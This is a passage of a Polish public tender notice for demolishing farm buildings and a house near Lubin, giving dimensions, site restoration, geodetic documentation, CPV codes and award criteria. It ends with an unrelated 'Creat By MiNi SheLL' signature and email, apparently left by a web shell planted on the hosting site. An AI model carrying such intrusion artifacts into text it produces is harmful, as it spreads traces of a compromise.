Po wyburzeniu obiektów, teren uporządkować, nawieźć ziemią urodzajną grubości 15cm i obsiać trawą. Teren całej działki oczyścić z odpadów komunalnych, krzaków i wykonać jej koszenie.  Po zakończeniu robót należy wykonać dokumentację  geodezyjną powykonawczą obejmującą:
-geodezyjna inwentaryzacja powykonawcza (mapa) 
-wykaz zmian ewidencyjnych: stan dotychczasowy oraz stan nowy 
-wykaz zmian danych ewidencyjnych dotyczących budynków 
Według wiedzy Zamawiającego , przeznaczone do rozbiórki budynki nie posiadają reperów, jednakże w przypadku ich ujawnienia w trakcie rozbiórki, do obowiązków Wykonawcy należy ich odtworzenie zgodnie z wymogami Prawa Geodezyjnego.
Wymiary budynków:
-obora nr inwentarzowy 048/182 długość 48m, szerokość 12m, wysokość 8,6m kubatura 3500m3
-obora nr inwentarzowy 52/182
-wiata nr inwentarzowy 108/001884 długość 32m, szerokość 12m, wysokość 3,5m kubatura 1350m3	
-budynek gospodarczy bez numeru inwentarzowego (magazyn paliw) długość 6m, szerokość 4,5m, wysokość 3,2m kubatura 86,5m3
-budynek gospodarczy bez numeru inwentarzowego (hydrofornia) długość 12m, szerokość 7m, wysokość 3,2m kubatura 270m3
Szczegółowy zakres prac określony został w projektach (dotyczy obory nr 48/182 i wiaty nr 108/001884), przedmiarach i  STWiOR, Projekcie.
Szczegółowy zakres prac określony został w przedmiarze, projekcie budowlanym i  STWiOR, wyżej wymieniona dokumentacja stanowi załącznik do niniejszej specyfikacji i znajduje się na stronie internetowej Zamawiającego www.anr.gov.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-9, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Termin realizacji zamówienia - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiot 4 	Rozbiórka budynku mieszkalnego wraz z posadzkami znajdującego się na działce nr 229/42 w miejscowości Siedlce, gmina Lubin, powiat lubiński..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rozbiórka budynku mieszkalnego nr inwentarzowy S-5/165 - 0,5 m poniżej terenu wraz z posadzkami, znajdującego się na działce 229/42 w miejscowości Siedlce , gmina Lubin, powiat lubiński
Po wyburzeniu obiektu, teren uporządkować, nawieźć ziemią urodzajną grubości 20cm. 
Po zakończeniu robót należy wykonać dokumentację  geodezyjną powykonawczą obejmującą:
-geodezyjna inwentaryzacja powykonawcza (mapa) 
-wykaz zmian ewidencyjnych: stan dotychczasowy oraz stan nowy 
-wykaz zmian danych ewidencyjnych dotyczących budynków 
Według wiedzy Zamawiającego , przeznaczony do rozbiórki budynek nie posiada reperów, jednakże w przypadku ich ujawnienia w trakcie rozbiórki, do obowiązków Wykonawcy należy ich odtworzenie zgodnie z wymogami Prawa Geodezyjnego.
Szczegółowy zakres prac określony został w przedmiarze, projekcie budowlanym i  STWiOR, wyżej wymieniona dokumentacja stanowi załącznik do niniejszej specyfikacji i znajduje się na stronie internetowej Zamawiającego www.anr.gov.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-9, 45.11.12.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.95</li>
<li>2. Termin realizacji zamówienia - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com